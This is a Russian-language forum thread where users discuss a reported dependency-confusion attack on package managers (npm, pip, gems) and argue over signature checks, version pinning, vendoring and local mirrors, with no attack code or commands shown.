| 133. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от JL2001 (ok), 10-Фев-21, 18:24 | ||
> Редхат как раз и есть внутренние штатные репо самого дистра RHE Линукс. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 152. "Атака на зависимости позволила выполнить код на серверах Pay..." | +2 +/– |  |
| Сообщение от Аноним (152), 10-Фев-21, 22:25 | ||
В теории ментейнер пакетов это не просто человек-компилятор, а ещё и в код смотрит и правит перед компиляцией если нужно. Хотя я почти уверен, что у красной шляпы соглашение написано не хуже чем у MS. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 163. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от JL2001 (ok), 11-Фев-21, 02:20 | ||
> В теории ментейнер пакетов это не просто человек-компилятор, а ещё и в | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 178. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от fske (?), 11-Фев-21, 18:44 | ||
>какая ответственность прописана у редхата/оракла/итд | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 124. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от пох. (?), 10-Фев-21, 17:50 | ||
> зы: какова ответственность редхата за появление в его репозитории дырявого или протрояненого | ||
| Ответить | Правка | К родителю #89 | Наверх | Cообщить модератору | ||
| ||
| 139. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (139), 10-Фев-21, 19:01 | ||
Поддерживаю. Собственно поэтому приходится у себя в гит репозитории хранить все эти миллиарды пакетов. Неудобно, да. Но куда деваться? | ||
| Ответить | Правка | К родителю #45 | Наверх | Cообщить модератору | ||
| ||
| 171. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от anonymous (??), 11-Фев-21, 11:17 | ||
Против выступать легко. А что в замен предложите? | ||
| Ответить | Правка | К родителю #45 | Наверх | Cообщить модератору | ||
| 50. "Атака на зависимости позволила выполнить код на серверах Pay..." | +2 +/– | |
| Сообщение от Андрей (??), 10-Фев-21, 13:13 | ||
Так я и не понял, это баг или фича. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 60. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Аноним (58), 10-Фев-21, 13:27 | ||
Это фича. А сабж это атака через фичу. Почти что социнженерия. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 62. "Атака на зависимости позволила выполнить код на серверах Pay..." | –1 +/– | |
| Сообщение от Аноним (62), 10-Фев-21, 13:28 | ||
Это квантовое программирование, багофича Шредингера. Будущее наступило. | ||
| Ответить | Правка | К родителю #50 | Наверх | Cообщить модератору | ||
| 52. "Атака на зависимости позволила выполнить код на серверах Pay..." | –2 +/– | |
| Сообщение от Аноним (58), 10-Фев-21, 13:15 | ||
И как раст от такого спасет? А вы говорите безопасный язык. А раст такая же дырень со своим крейтсом. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 63. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от pda (?), 10-Фев-21, 13:30 | ||
crate не подвержен этой проблеме. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 73. Скрыто модератором | –4 +/– | |
| Сообщение от Платные Эксплоиты и Шифровальщики (?), 10-Фев-21, 13:47 | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 172. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от anonymous (??), 11-Фев-21, 11:19 | ||
Во-первых в rust этой уязвимости нет. Во-вторых rust -- это про safety, а не про security. | ||
| Ответить | Правка | К родителю #52 | Наверх | Cообщить модератору | ||
| 55. "Атака на зависимости позволила выполнить код на серверах Pay..." | –1 +/– | |
| Сообщение от Аноним (55), 10-Фев-21, 13:21 | ||
Не глупо ли это само по себе - выкладывать на публику проекты, зависящие от неопубликованных библиотек. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 91. "Атака на зависимости позволила выполнить код на серверах Pay..." | +3 +/– | |
| Сообщение от JL2001 (ok), 10-Фев-21, 14:32 | ||
> Не глупо ли это само по себе - выкладывать на публику проекты, | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 61. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Аноним (61), 10-Фев-21, 13:27 | ||
запускайте npm/pip/gems install на машинах разработчиков без изоляции, он вам и shell установит пользователям для кражи ssh-keys агента и вместе с вашими криптокошельками и рабочими местами. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 125. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от пох. (?), 10-Фев-21, 17:51 | ||
> запускайте npm/pip/gems install на машинах разработчиков без изоляции | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 154. "Атака на зависимости позволила выполнить код на серверах Pay..." | +2 +/– | |
| Сообщение от Аноним (152), 10-Фев-21, 22:28 | ||
Микросервис в вебассемблю в контейнер в виртуальную машину в облаке. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 201. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (201), 16-Фев-21, 18:46 | ||
А в яйце игла | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 64. "Атака на зависимости позволила выполнить код на серверах Pay..." | +2 +/– | |
| Сообщение от JL2001 (ok), 10-Фев-21, 13:30 | ||
чо там, пацаны, давно в vlc-ppa публиковали linux-generic-7.0.1 ? | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 66. "Атака на зависимости позволила выполнить код на серверах Pay..." | –2 +/– | |
| Сообщение от JL2001 (ok), 10-Фев-21, 13:36 | ||
> добавив в скрипт, запускаемый перед началом установки (preinstall в NPM), код для сбора информации о системе и отправки полученных сведений на внешний хост | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 76. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Аноним (61), 10-Фев-21, 13:50 | ||
Оно и без рута отлично линукс юзерам установит сервисы. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 71. "Атака на зависимости позволила выполнить код на серверах Pay..." | +3 +/– |  |
| Сообщение от PetrG (ok), 10-Фев-21, 13:44 | ||
Мой любимый кошмар на работе - почти каждый проект закачивает пол интернета при сборке. И мало кто понимает что там. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 93. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Аноним (58), 10-Фев-21, 14:46 | ||
Выкачать всё в локальный репозиторий, сделать локальные пакеты. Запретить качать из инета, но не полностью. И ждать когда из интернет к тебе прилетит его клон. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 99. "Атака на зависимости позволила выполнить код на серверах Pay..." | +4 +/– | |
| Сообщение от Аноним (61), 10-Фев-21, 14:58 | ||
Чем отличается фиксация пакетов с малварями от скачивания актуальной версии малвари? | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 107. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от JL2001 (ok), 10-Фев-21, 15:50 | ||
> Чем отличается фиксация пакетов с малварями от скачивания актуальной версии малвари? | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 142. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (61), 10-Фев-21, 19:27 | ||
Поднялась шумиха, и твой пакетик на проде клиента дальше летит с вирусами. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 74. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (74), 10-Фев-21, 13:49 | ||
А как же Perl? :3 | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 75. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (61), 10-Фев-21, 13:50 | ||
Залатали временно | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 81. "Атака на зависимости позволила выполнить код на серверах Pay..." | +2 +/– | |
| Сообщение от Аноним (81), 10-Фев-21, 14:06 | ||
> А как же Perl? :3 | ||
| Ответить | Правка | К родителю #74 | Наверх | Cообщить модератору | ||
| ||
| 189. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (189), 12-Фев-21, 14:41 | ||
А зря. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 77. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (77), 10-Фев-21, 13:55 | ||
вот тебе и DevУпс! | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 80. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (80), 10-Фев-21, 14:01 | ||
Очевидная атака. Удивительно что такие компании при сборке используют зависимости с инетов и не проверяют даже их подписи. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 82. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Аноним (61), 10-Фев-21, 14:06 | ||
Проверки подписи не у всех есть, да и проверяет вначале публичные репы и только потом приватные. Компании сами должен присылать патчи. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 110. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Аноним (110), 10-Фев-21, 15:59 | ||
Скачивают руками, локально и только потом собираю. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 116. "Атака на зависимости позволила выполнить код на серверах Pay..." | +2 +/– | |
| Сообщение от Страдивариус (?), 10-Фев-21, 16:46 | ||
Анониму всё очевидно, но 130К грина ушло опять не ему =) | ||
| Ответить | Правка | К родителю #80 | Наверх | Cообщить модератору | ||
| 83. "Атака на зависимости позволила выполнить код на серверах Pay..." | +4 +/– | |
| Сообщение от Аноним (74), 10-Фев-21, 14:07 | ||
Для пистона это норма. Даже прожекты с мегатоннами звест на гитхубе, имеют мегатонны же проблем с зависимостями и всякого дерьма в своем составе. npm уже вообще что-то вроде мема. Go ждёт такое же будущее ибо язык рассчитан на идиотов. Это не значит что на нём пишут токма дураки, но даун-френдли политика, не доводит до добра. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 92. "Атака на зависимости позволила выполнить код на серверах Pay..." | –1 +/– | |
| Сообщение от Аноним (58), 10-Фев-21, 14:44 | ||
Ну все значит нам нужна единая платформа, которая будет монолитна полностью запрещающая сторонние зависимости и имеет богатую дефолтную библиотеку. Только как её сделать? | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 97. "Атака на зависимости позволила выполнить код на серверах Pay..." | +2 +/– | |
| Сообщение от Аноним (97), 10-Фев-21, 14:56 | ||
Может не нужна платформа, а достаточно просто научиться программировать и делать зеродеп проги весом в десяток килобайт ? Или так не учили ? | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 108. "Атака на зависимости позволила выполнить код на серверах Pay..." | –1 +/– | |
| Сообщение от JL2001 (ok), 10-Фев-21, 15:52 | ||
> Может не нужна платформа, а достаточно просто научиться программировать и делать зеродеп | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 104. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (74), 10-Фев-21, 15:15 | ||
Проблема не в зависимостях, а в навыках и культуре разработки, которые хромают у упомянутых язычков | ||
| Ответить | Правка | К родителю #92 | Наверх | Cообщить модератору | ||
| ||
| 187. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Стереопаштет (?), 12-Фев-21, 06:10 | ||
Проблема не в навыках, а в том что рынку нужно быстро и дешево. За идеальных сферических коней в вакууме никто не собирается платить. И если ты предложишь бизнесу писать велосипеды с нуля или перепроверять каждую версию каждой зависимости - на тебя как минимум посмотрят как на сумасшедшего. Либо ты находишь балланс между затратами-сесурити-скоростью разработки-багами-фичами, либо идешь ночевать под мостом (зато ты гордый и правильный! Не смузихлеб и не девляпс.). | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 94. "Атака на зависимости позволила выполнить код на серверах Pay..." | –2 +/– | |
| Сообщение от Аноним (24), 10-Фев-21, 14:54 | ||
А что разве в GO уже переделали ? Раньше в GO чтобы цеплять файлы с гитхаба нужно было писать "github.com/mattn/go-sqlite3" | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 112. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– |  |
| Сообщение от Брат Анон (ok), 10-Фев-21, 16:10 | ||
`go mod vendor` тебе в помощь. В голанге не так. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 181. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от еман (?), 11-Фев-21, 22:15 | ||
в Go - ещё лучше: на go get, go лезет к гуглу и спрашивает у него, можно ли скачать такой-то пакет, и качает только после утвердительного ответа. так что, если пакета нет в общественнодоступном ынтернете, нужно пользоваться специальными параметрами и специальными конфигурациями. | ||
| Ответить | Правка | К родителю #94 | Наверх | Cообщить модератору | ||
| 96. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Оуноуним (?), 10-Фев-21, 14:56 | ||
Чем проще разработка, тем проще эксплуатация уязвимостей. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 98. "Атака на зависимости позволила выполнить код на серверах Pay..." | –1 +/– | |
| Сообщение от Аноним (24), 10-Фев-21, 14:58 | ||
Тем проще ее заметить. Вон в ядре поди чего только нет ... исходники то открыты а толку от этого. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 126. "Атака на зависимости позволила выполнить код на серверах Pay..." | –1 +/– | |
| Сообщение от пох. (?), 10-Фев-21, 17:53 | ||
> Тем проще ее заметить. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 145. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Аноним (145), 10-Фев-21, 19:30 | ||
Заманивать хакера на живца/деньги/печеньки. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 105. "Атака на зависимости позволила выполнить код на серверах Pay..." | +4 +/– |  |
| Сообщение от Erley (ok), 10-Фев-21, 15:23 | ||
Странно что никто не озадачился проверкой базовых образов на которых собираются докер-контейнеры. Часто вижу как люди там используют какие-то мутные сборки убунты и тп. Вот где раздолье для хакеров! | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 144. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (145), 10-Фев-21, 19:29 | ||
Местные комментаторы уже давно знают что даже в надежном источнике с проверенной подписью есть сишная дырень. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 161. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от JL2001 (ok), 11-Фев-21, 02:12 | ||
> Местные комментаторы уже давно знают что даже в надежном источнике с проверенной | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 111. "Атака на зависимости позволила выполнить код на серверах Pay..." | –1 +/– | |
| Сообщение от Брат Анон (ok), 10-Фев-21, 16:09 | ||
Так-то вендоринг в golang великая сила)) | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 117. Скрыто модератором | –1 +/– | |
| Сообщение от Аноним (117), 10-Фев-21, 17:01 | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 127. Скрыто модератором | –1 +/– | |
| Сообщение от пох. (?), 10-Фев-21, 17:56 | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 120. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Аноним (120), 10-Фев-21, 17:17 | ||
Похоже, что пакетный ад Javascript дал о себе знать. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 135. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от JL2001 (ok), 10-Фев-21, 18:28 | ||
> Похоже, что пакетный ад Javascript дал о себе знать. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 143. "Атака на зависимости позволила выполнить код на серверах Pay..." | +4 +/– | |
| Сообщение от Аноним (145), 10-Фев-21, 19:28 | ||
Не так страшен жараскрипт как те кто на нем пишут. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 155. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от InuYasha (??), 10-Фев-21, 22:29 | ||
как то, что на нём пишут ) | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 121. "Атака на зависимости позволила выполнить код на серверах Pay..." | –2 +/– | |
| Сообщение от Аноним (120), 10-Фев-21, 17:24 | ||
Вообще-то когда скачивается пакет, должна подпись проверяться. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 129. "Атака на зависимости позволила выполнить код на серверах Pay..." | +2 +/– | |
| Сообщение от пох. (?), 10-Фев-21, 17:57 | ||
дык, норм у него была подпись - в точности того чувака, который его честно создал. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 136. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от JL2001 (ok), 10-Фев-21, 18:30 | ||
> Вообще-то когда скачивается пакет, должна подпись проверяться. | ||
| Ответить | Правка | К родителю #121 | Наверх | Cообщить модератору | ||
| ||
| 167. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (167), 11-Фев-21, 05:19 | ||
Есть лучше вариант — пинить версии пакетов (и всех зависимостей конечно) и умеют это чуть менее чем все современные менеджеры пакетов скриптовых языков. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 179. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от JL2001 (ok), 11-Фев-21, 18:45 | ||
> Есть лучше вариант — пинить версии пакетов (и всех зависимостей конечно) и | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 122. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– |  |
| Сообщение от mumu (ok), 10-Фев-21, 17:24 | ||
Зачем тестировать? Просто пользуйтесь! Пользуйтесь все! Пока гром не грянет, мужик не перекрестится. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 130. "Атака на зависимости позволила выполнить код на серверах Pay..." | –1 +/– | |
| Сообщение от пох. (?), 10-Фев-21, 17:58 | ||
Ну ты же понимаешь, что необходимость поддерживать функции оригинала (скачав его отдельно в обход автоматики) только немного усложнит троянский код? | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 138. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– |  |
| Сообщение от Леголас (ok), 10-Фев-21, 18:50 | ||
Вы про Герасима? | ||
| Ответить | Правка | К родителю #122 | Наверх | Cообщить модератору | ||
| 123. "Атака на зависимости позволила выполнить код на серверах Pay..." | +2 +/– | |
| Сообщение от Аноним (123), 10-Фев-21, 17:49 | ||
Всего 130 тысяч долларов, за такую черную ды ру, вас на.. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 150. "Атака на зависимости позволила выполнить код на серверах Pay..." | –1 +/– | |
| Сообщение от пох. (?), 10-Фев-21, 20:34 | ||
Чуваки просили передать, что мешок, в котором они уволокли дань, ничуть от этого не испортился, и они планируют зайти с ним через недельку, как только закончат подсчитывать предыдущую добычу. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 131. "Атака на зависимости позволила выполнить код на серверах Pay..." | –3 +/– | |
| Сообщение от Аноним (131), 10-Фев-21, 18:15 | ||
Вот зачем девопсы нужны. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 137. "Атака на зависимости позволила выполнить код на серверах Pay..." | –1 +/– | |
| Сообщение от Аноним (61), 10-Фев-21, 18:44 | ||
Девпсы бесполезные существа. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 188. "Атака на зависимости позволила выполнить код на серверах Pay..." | –1 +/– | |
| Сообщение от Рр (?), 12-Фев-21, 06:15 | ||
Ненавижу девопсов. Меня в детстве огромный лохматый девопс покусал за ногу. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 140. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (140), 10-Фев-21, 19:07 | ||
Девляпсы опять налетели на проблемы говнорепозитариев... | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 141. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Аноним (145), 10-Фев-21, 19:27 | ||
Смузи разработчики не умеют разрабатывать. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 158. "Атака на зависимости позволила выполнить код на серверах Pay..." | –1 +/– |  |
| Сообщение от srgazh (ok), 11-Фев-21, 00:13 | ||
75% от всех зафиксированных запусков кода были связаны с загрузкой NPM- Вот это ДЫРА. Как бороться с этим node и тп... | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 159. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– |  |
| Сообщение от Ilya Indigo (ok), 11-Фев-21, 01:01 | ||
Молодец человек! | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 176. "Атака на зависимости позволила выполнить код на серверах Pay..." | +2 +/– | |
| Сообщение от Аноним (176), 11-Фев-21, 15:49 | ||
А мог бы стать миллионом собирая фермы на ригах | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 160. "Атака на зависимости позволила выполнить код на серверах Pay..." | +1 +/– | |
| Сообщение от Аноним (160), 11-Фев-21, 02:10 | ||
Внешние автоматически выкачиваемые зависимости — это всегда риск. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| ||
| 164. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от JL2001 (ok), 11-Фев-21, 02:24 | ||
> Внешние автоматически выкачиваемые зависимости — это всегда риск. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 165. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– |  |
| Сообщение от deeaitch (ok), 11-Фев-21, 04:05 | ||
Вот кто бы сомневался во всех этох npn, ruby-чего-то там. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 166. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (167), 11-Фев-21, 05:16 | ||
Надуманная проблема для python. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 173. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от .NET (?), 11-Фев-21, 14:09 | ||
А как выполнить произвольный код в NuGet-пакете после его загрузки, если ни один из его типов не используется? | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 191. "Атака на зависимости позволила выполнить код на серверах Pay..." | +/– | |
| Сообщение от Аноним (189), 12-Фев-21, 14:43 | ||
Другим урок. Расслабляться нельзя. Всё время надо быть на чеке. | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
|
Архив | Удалить |
Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема |
